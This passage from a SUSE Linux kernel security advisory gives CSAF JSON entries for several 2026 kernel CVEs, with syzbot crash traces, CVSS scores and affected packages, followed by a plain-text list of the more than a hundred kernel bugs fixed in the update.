"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2026-23006"
},
{
"cve": "CVE-2026-23010",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23010"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: Fix use-after-free in inet6_addr_del().\n\nsyzbot reported use-after-free of inet6_ifaddr in\ninet6_addr_del(). [0]\n\nThe cited commit accidentally moved ipv6_del_addr() for\nmngtmpaddr before reading its ifp-\u003eflags for temporary\naddresses in inet6_addr_del().\n\nLet\u0027s move ipv6_del_addr() down to fix the UAF.\n\n[0]:\nBUG: KASAN: slab-use-after-free in inet6_addr_del.constprop.0+0x67a/0x6b0 net/ipv6/addrconf.c:3117\nRead of size 4 at addr ffff88807b89c86c by task syz.3.1618/9593\n\nCPU: 0 UID: 0 PID: 9593 Comm: syz.3.1618 Not tainted syzkaller #0 PREEMPT(full)\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 10/25/2025\nCall Trace:\n \u003cTASK\u003e\n __dump_stack lib/dump_stack.c:94 [inline]\n dump_stack_lvl+0x116/0x1f0 lib/dump_stack.c:120\n print_address_description mm/kasan/report.c:378 [inline]\n print_report+0xcd/0x630 mm/kasan/report.c:482\n kasan_report+0xe0/0x110 mm/kasan/report.c:595\n inet6_addr_del.constprop.0+0x67a/0x6b0 net/ipv6/addrconf.c:3117\n addrconf_del_ifaddr+0x11e/0x190 net/ipv6/addrconf.c:3181\n inet6_ioctl+0x1e5/0x2b0 net/ipv6/af_inet6.c:582\n sock_do_ioctl+0x118/0x280 net/socket.c:1254\n sock_ioctl+0x227/0x6b0 net/socket.c:1375\n vfs_ioctl fs/ioctl.c:51 [inline]\n __do_sys_ioctl fs/ioctl.c:597 [inline]\n __se_sys_ioctl fs/ioctl.c:583 [inline]\n __x64_sys_ioctl+0x18e/0x210 fs/ioctl.c:583\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0xcd/0xf80 arch/x86/entry/syscall_64.c:94\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\nRIP: 0033:0x7f164cf8f749\nCode: ff ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 \u003c48\u003e 3d 01 f0 ff ff 73 01 c3 48 c7 c1 a8 ff ff ff f7 d8 64 89 01 48\nRSP: 002b:00007f164de64038 EFLAGS: 00000246 ORIG_RAX: 0000000000000010\nRAX: ffffffffffffffda RBX: 00007f164d1e5fa0 RCX: 00007f164cf8f749\nRDX: 0000200000000000 RSI: 0000000000008936 RDI: 0000000000000003\nRBP: 00007f164d013f91 R08: 0000000000000000 R09: 0000000000000000\nR10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000000\nR13: 00007f164d1e6038 R14: 00007f164d1e5fa0 R15: 00007ffde15c8288\n \u003c/TASK\u003e\n\nAllocated by task 9593:\n kasan_save_stack+0x33/0x60 mm/kasan/common.c:56\n kasan_save_track+0x14/0x30 mm/kasan/common.c:77\n poison_kmalloc_redzone mm/kasan/common.c:397 [inline]\n __kasan_kmalloc+0xaa/0xb0 mm/kasan/common.c:414\n kmalloc_noprof include/linux/slab.h:957 [inline]\n kzalloc_noprof include/linux/slab.h:1094 [inline]\n ipv6_add_addr+0x4e3/0x2010 net/ipv6/addrconf.c:1120\n inet6_addr_add+0x256/0x9b0 net/ipv6/addrconf.c:3050\n addrconf_add_ifaddr+0x1fc/0x450 net/ipv6/addrconf.c:3160\n inet6_ioctl+0x103/0x2b0 net/ipv6/af_inet6.c:580\n sock_do_ioctl+0x118/0x280 net/socket.c:1254\n sock_ioctl+0x227/0x6b0 net/socket.c:1375\n vfs_ioctl fs/ioctl.c:51 [inline]\n __do_sys_ioctl fs/ioctl.c:597 [inline]\n __se_sys_ioctl fs/ioctl.c:583 [inline]\n __x64_sys_ioctl+0x18e/0x210 fs/ioctl.c:583\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0xcd/0xf80 arch/x86/entry/syscall_64.c:94\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n\nFreed by task 6099:\n kasan_save_stack+0x33/0x60 mm/kasan/common.c:56\n kasan_save_track+0x14/0x30 mm/kasan/common.c:77\n kasan_save_free_info+0x3b/0x60 mm/kasan/generic.c:584\n poison_slab_object mm/kasan/common.c:252 [inline]\n __kasan_slab_free+0x5f/0x80 mm/kasan/common.c:284\n kasan_slab_free include/linux/kasan.h:234 [inline]\n slab_free_hook mm/slub.c:2540 [inline]\n slab_free_freelist_hook mm/slub.c:2569 [inline]\n slab_free_bulk mm/slub.c:6696 [inline]\n kmem_cache_free_bulk mm/slub.c:7383 [inline]\n kmem_cache_free_bulk+0x2bf/0x680 mm/slub.c:7362\n kfree_bulk include/linux/slab.h:830 [inline]\n kvfree_rcu_bulk+0x1b7/0x1e0 mm/slab_common.c:1523\n kvfree_rcu_drain_ready mm/slab_common.c:1728 [inline]\n kfree_rcu_monitor+0x1d0/0x2f0 mm/slab_common.c:1801\n process_one_work+0x9ba/0x1b20 kernel/workqueue.c:3257\n process_scheduled_works kernel/workqu\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23010",
"url": "https://www.suse.com/security/cve/CVE-2026-23010"
},
{
"category": "external",
"summary": "SUSE Bug 1257332 for CVE-2026-23010",
"url": "https://bugzilla.suse.com/1257332"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2026-23010"
},
{
"cve": "CVE-2026-23011",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23011"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv4: ip_gre: make ipgre_header() robust\n\nAnalog to commit db5b4e39c4e6 (\"ip6_gre: make ip6gre_header() robust\")\n\nOver the years, syzbot found many ways to crash the kernel\nin ipgre_header() [1].\n\nThis involves team or bonding drivers ability to dynamically\nchange their dev-\u003eneeded_headroom and/or dev-\u003ehard_header_len\n\nIn this particular crash mld_newpack() allocated an skb\nwith a too small reserve/headroom, and by the time mld_sendpack()\nwas called, syzbot managed to attach an ipgre device.\n\n[1]\nskbuff: skb_under_panic: text:ffffffff89ea3cb7 len:2030915468 put:2030915372 head:ffff888058b43000 data:ffff887fdfa6e194 tail:0x120 end:0x6c0 dev:team0\n kernel BUG at net/core/skbuff.c:213 !\nOops: invalid opcode: 0000 [#1] SMP KASAN PTI\nCPU: 1 UID: 0 PID: 1322 Comm: kworker/1:9 Not tainted syzkaller #0 PREEMPT(full)\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 10/25/2025\nWorkqueue: mld mld_ifc_work\n RIP: 0010:skb_panic+0x157/0x160 net/core/skbuff.c:213\nCall Trace:\n \u003cTASK\u003e\n skb_under_panic net/core/skbuff.c:223 [inline]\n skb_push+0xc3/0xe0 net/core/skbuff.c:2641\n ipgre_header+0x67/0x290 net/ipv4/ip_gre.c:897\n dev_hard_header include/linux/netdevice.h:3436 [inline]\n neigh_connected_output+0x286/0x460 net/core/neighbour.c:1618\n NF_HOOK_COND include/linux/netfilter.h:307 [inline]\n ip6_output+0x340/0x550 net/ipv6/ip6_output.c:247\n NF_HOOK+0x9e/0x380 include/linux/netfilter.h:318\n mld_sendpack+0x8d4/0xe60 net/ipv6/mcast.c:1855\n mld_send_cr net/ipv6/mcast.c:2154 [inline]\n mld_ifc_work+0x83e/0xd60 net/ipv6/mcast.c:2693\n process_one_work kernel/workqueue.c:3257 [inline]\n process_scheduled_works+0xad1/0x1770 kernel/workqueue.c:3340\n worker_thread+0x8a0/0xda0 kernel/workqueue.c:3421\n kthread+0x711/0x8a0 kernel/kthread.c:463\n ret_from_fork+0x510/0xa50 arch/x86/kernel/process.c:158\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:246",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23011",
"url": "https://www.suse.com/security/cve/CVE-2026-23011"
},
{
"category": "external",
"summary": "SUSE Bug 1257207 for CVE-2026-23011",
"url": "https://bugzilla.suse.com/1257207"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2026-23011"
}
]
}
SUSE-SU-2026:20845-1
Vulnerability from csaf_suse - Published: 2026-03-24 16:48 - Updated: 2026-03-24 16:48Summary
Security update for the Linux Kernel
Severity
Important
Notes
Title of the patch: Security update for the Linux Kernel
Description of the patch:
The SUSE Linux Enterprise Micro 6.0 and 6.1 RT kernel was updated to receive various security bugfixes.
The following security bugs were fixed:
- CVE-2023-53817: crypto: lib/mpi - avoid null pointer deref in mpi_cmp_ui() (bsc#1254992).
- CVE-2025-37861: scsi: mpi3mr: Synchronous access b/w reset and tm thread for reply queue (bsc#1243055).
- CVE-2025-38321: smb: Log an error when close_all_cached_dirs fails (bsc#1246328).
- CVE-2025-38728: smb3: fix for slab out of bounds on mount to ksmbd (bsc#1249256).
- CVE-2025-39748: bpf: Forget ranges when refining tnum after JSET (bsc#1249587).
- CVE-2025-39880: libceph: fix invalid accesses to ceph_connection_v1_info (bsc#1250388).
- CVE-2025-39890: wifi: ath12k: fix memory leak in ath12k_service_ready_ext_event (bsc#1250334).
- CVE-2025-39964: crypto: af_alg - Disallow concurrent writes in af_alg_sendmsg (bsc#1251966).
- CVE-2025-39977: futex: Prevent use-after-free during requeue-PI (bsc#1252046).
- CVE-2025-40006: mm/hugetlb: fix folio is still mapped when deleted (bsc#1252342).
- CVE-2025-40024: vhost: Take a reference on the task in struct vhost_task (bsc#1252686).
- CVE-2025-40033: remoteproc: pru: Fix potential NULL pointer dereference in pru_rproc_set_ctable() (bsc#1252824).
- CVE-2025-40042: tracing: Fix race condition in kprobe initialization causing NULL pointer dereference (bsc#1252861).
- CVE-2025-40053: net: dlink: handle copy_thresh allocation failure (bsc#1252808).
- CVE-2025-40081: perf: arm_spe: Prevent overflow in PERF_IDX2OFF() (bsc#1252776).
- CVE-2025-40099: cifs: parse_dfs_referrals: prevent oob on malformed input (bsc#1252911).
- CVE-2025-40102: KVM: arm64: Prevent access to vCPU events before init (bsc#1252919).
- CVE-2025-40103: smb: client: Fix refcount leak for cifs_sb_tlink (bsc#1252924).
- CVE-2025-40123: bpf: Enforce expected_attach_type for tailcall compatibility (bsc#1253365).
- CVE-2025-40134: dm: fix NULL pointer dereference in __dm_suspend() (bsc#1253386).
- CVE-2025-40135: ipv6: use RCU in ip6_xmit() (bsc#1253342).
- CVE-2025-40153: mm: hugetlb: avoid soft lockup when mprotect to large memory area (bsc#1253408).
- CVE-2025-40158: ipv6: use RCU in ip6_output() (bsc#1253402).
- CVE-2025-40160: xen/events: Cleanup find_virq() return codes (bsc#1253400).
- CVE-2025-40167: ext4: detect invalid INLINE_DATA + EXTENTS flag combination (bsc#1253458).
- CVE-2025-40170: net: use dst_dev_rcu() in sk_setup_caps() (bsc#1253413).
- CVE-2025-40178: pid: Add a judgment for ns null in pid_nr_ns (bsc#1253463).
- CVE-2025-40179: ext4: verify orphan file size is not too big (bsc#1253442).
- CVE-2025-40187: net/sctp: fix a null dereference in sctp_disposition sctp_sf_do_5_1D_ce() (bsc#1253647).
- CVE-2025-40190: ext4: guard against EA inode refcount underflow in xattr update (bsc#1253623).
- CVE-2025-40192: Revert "ipmi: fix msg stack when IPMI is disconnected" (bsc#1253622).
- CVE-2025-40220: fuse: fix livelock in synchronous file put from fuseblk workers (bsc#1254520).
- CVE-2025-40231: vsock: fix lock inversion in vsock_assign_transport() (bsc#1254815).
- CVE-2025-40233: ocfs2: clear extent cache after moving/defragmenting extents (bsc#1254813).
- CVE-2025-40238: net/mlx5: Fix IPsec cleanup over MPV device (bsc#1254871).
- CVE-2025-40240: sctp: avoid NULL dereference when chunk data buffer is missing (bsc#1254869).
- CVE-2025-40242: gfs2: Fix unlikely race in gdlm_put_lock (bsc#1255075).
- CVE-2025-40248: vsock: Ignore signal/timeout on connect() if already established (bsc#1254864).
- CVE-2025-40250: net/mlx5: Clean up only new IRQ glue on request_irq() failure (bsc#1254854).
- CVE-2025-40251: devlink: rate: Unset parent pointer in devl_rate_nodes_destroy (bsc#1254856).
- CVE-2025-40252: net: qlogic/qede: fix potential out-of-bounds read in qede_tpa_cont() and qede_tpa_end() (bsc#1254849).
- CVE-2025-40254: net: openvswitch: remove never-working support for setting nsh fields (bsc#1254852).
- CVE-2025-40257: mptcp: fix a race in mptcp_pm_del_add_timer() (bsc#1254842).
- CVE-2025-40258: mptcp: fix race condition in mptcp_schedule_work() (bsc#1254843).
- CVE-2025-40259: scsi: sg: Do not sleep in atomic context (bsc#1254845).
- CVE-2025-40261: nvme: nvme-fc: Ensure ->ioerr_work is cancelled in nvme_fc_delete_ctrl() (bsc#1254839).
- CVE-2025-40264: be2net: pass wrb_params in case of OS2BMC (bsc#1254835).
- CVE-2025-40268: cifs: client: fix memory leak in smb3_fs_context_parse_param (bsc#1255082).
- CVE-2025-40271: fs/proc: fix uaf in proc_readdir_de() (bsc#1255297).
- CVE-2025-40274: KVM: guest_memfd: Remove bindings on memslot deletion when gmem is dying (bsc#1254830).
- CVE-2025-40278: net: sched: act_ife: initialize struct tc_ife to fix KMSAN kernel-infoleak (bsc#1254825).
- CVE-2025-40279: net: sched: act_connmark: initialize struct tc_ife to fix kernel leak (bsc#1254846).
- CVE-2025-40280: tipc: Fix use-after-free in tipc_mon_reinit_self() (bsc#1254847).
- CVE-2025-40289: drm/amdgpu: hide VRAM sysfs attributes on GPUs without VRAM (bsc#1255042).
- CVE-2025-40292: virtio-net: fix received length check in big packets (bsc#1255175).
- CVE-2025-40293: iommufd: Don't overflow during division for dirty tracking (bsc#1255179).
- CVE-2025-40297: net: bridge: fix use-after-free due to MST port state bypass (bsc#1255187).
- CVE-2025-40307: exfat: validate cluster allocation bits of the allocation bitmap (bsc#1255039).
- CVE-2025-40319: bpf: Sync pending IRQ work before freeing ring buffer (bsc#1254794).
- CVE-2025-40328: smb: client: fix potential UAF in smb2_close_cached_fid() (bsc#1254624).
- CVE-2025-40331: sctp: Prevent TOCTOU out-of-bounds write (bsc#1254615).
- CVE-2025-40338: ASoC: Intel: avs: Do not share the name pointer between components (bsc#1255273).
- CVE-2025-40339: drm/amdgpu: fix nullptr err of vm_handle_moved (bsc#1255428).
- CVE-2025-40346: arch_topology: Fix incorrect error check in topology_parse_cpu_capacity() (bsc#1255318).
- CVE-2025-40350: net/mlx5e: RX, Fix generating skb from non-linear xdp_buff for striding RQ (bsc#1255260).
- CVE-2025-40355: sysfs: check visibility before changing group attribute ownership (bsc#1255261).
- CVE-2025-40360: drm/sysfb: Do not dereference NULL pointer in plane reset (bsc#1255095).
- CVE-2025-40363: net: ipv6: fix field-spanning memcpy warning in AH output (bsc#1255102).
- CVE-2025-68171: x86/fpu: Ensure XFD state on signal delivery (bsc#1255255).
- CVE-2025-68174: amd/amdkfd: enhance kfd process check in switch partition (bsc#1255327).
- CVE-2025-68178: blk-cgroup: fix possible deadlock while configuring policy (bsc#1255266).
- CVE-2025-68188: tcp: use dst_dev_rcu() in tcp_fastopen_active_disable_ofo_check() (bsc#1255269).
- CVE-2025-68190: drm/amdgpu/atom: Check kcalloc() for WS buffer in amdgpu_atom_execute_table_locked() (bsc#1255131).
- CVE-2025-68200: bpf: Add bpf_prog_run_data_pointers() (bsc#1255241).
- CVE-2025-68201: drm/amdgpu: remove two invalid BUG_ON()s (bsc#1255136).
- CVE-2025-68204: pmdomain: arm: scmi: Fix genpd leak on provider registration failure (bsc#1255224).
- CVE-2025-68206: netfilter: nft_ct: add seqadj extension for natted connections (bsc#1255142).
- CVE-2025-68208: bpf: account for current allocated stack depth in widen_imprecise_scalars() (bsc#1255227).
- CVE-2025-68209: mlx5: Fix default values in create CQ (bsc#1255230).
- CVE-2025-68227: mptcp: Fix proto fallback detection with BPF (bsc#1255216).
- CVE-2025-68230: drm/amdgpu: fix gpu page fault after hibernation on PF passthrough (bsc#1255134).
- CVE-2025-68239: binfmt_misc: restore write access before closing files opened by open_exec() (bsc#1255272).
- CVE-2025-68241: ipv4: route: Prevent rt_bind_exception() from rebinding stale fnhe (bsc#1255157).
- CVE-2025-68245: net: netpoll: fix incorrect refcount handling causing incorrect cleanup (bsc#1255268).
- CVE-2025-68255: staging: rtl8723bs: fix stack buffer overflow in OnAssocReq IE parsing (bsc#1255395).
- CVE-2025-68259: KVM: SVM: Don't skip unrelated instruction if INT3/INTO is replaced (bsc#1255199).
- CVE-2025-68261: ext4: add i_data_sem protection in ext4_destroy_inline_data_nolock() (bsc#1255164).
- CVE-2025-68264: ext4: refresh inline data size before write operations (bsc#1255380).
- CVE-2025-68283: libceph: replace BUG_ON with bounds check for map->max_osd (bsc#1255379).
- CVE-2025-68284: libceph: prevent potential out-of-bounds writes in handle_auth_session_key() (bsc#1255377).
- CVE-2025-68285: libceph: fix potential use-after-free in have_mon_and_osd_map() (bsc#1255401).
- CVE-2025-68295: smb: client: fix memory leak in cifs_construct_tcon() (bsc#1255129).
- CVE-2025-68296: drm, fbcon, vga_switcheroo: Avoid race condition in fbcon setup (bsc#1255128).
- CVE-2025-68297: ceph: fix crash in process_v2_sparse_read() for encrypted directories (bsc#1255403).
- CVE-2025-68301: net: atlantic: fix fragment overflow handling in RX path (bsc#1255120).
- CVE-2025-68320: lan966x: Fix sleeping in atomic context (bsc#1255172).
- CVE-2025-68325: net/sched: sch_cake: Fix incorrect qlen reduction in cake_drop (bsc#1255417).
- CVE-2025-68327: usb: renesas_usbhs: Fix synchronous external abort on unbind (bsc#1255488).
- CVE-2025-68337: jbd2: avoid bug_on in jbd2_journal_get_create_access() when file system corrupted (bsc#1255482).
- CVE-2025-68340: team: Move team device type change at the end of team_port_add (bsc#1255507).
- CVE-2025-68349: NFSv4/pNFS: Clear NFS_INO_LAYOUTCOMMIT in pnfs_mark_layout_stateid_invalid (bsc#1255544).
- CVE-2025-68363: bpf: Check skb->transport_header is set in bpf_skb_check_mtu (bsc#1255552).
- CVE-2025-68365: fs/ntfs3: Initialize allocated memory before use (bsc#1255548).
- CVE-2025-68366: nbd: defer config unlock in nbd_genl_connect (bsc#1255622).
- CVE-2025-68367: macintosh/mac_hid: fix race condition in mac_hid_toggle_emumouse (bsc#1255547).
- CVE-2025-68372: nbd: defer config put in recv_work (bsc#1255537).
- CVE-2025-68374: md: fix rcu protection in md_wakeup_thread (bsc#1255530).
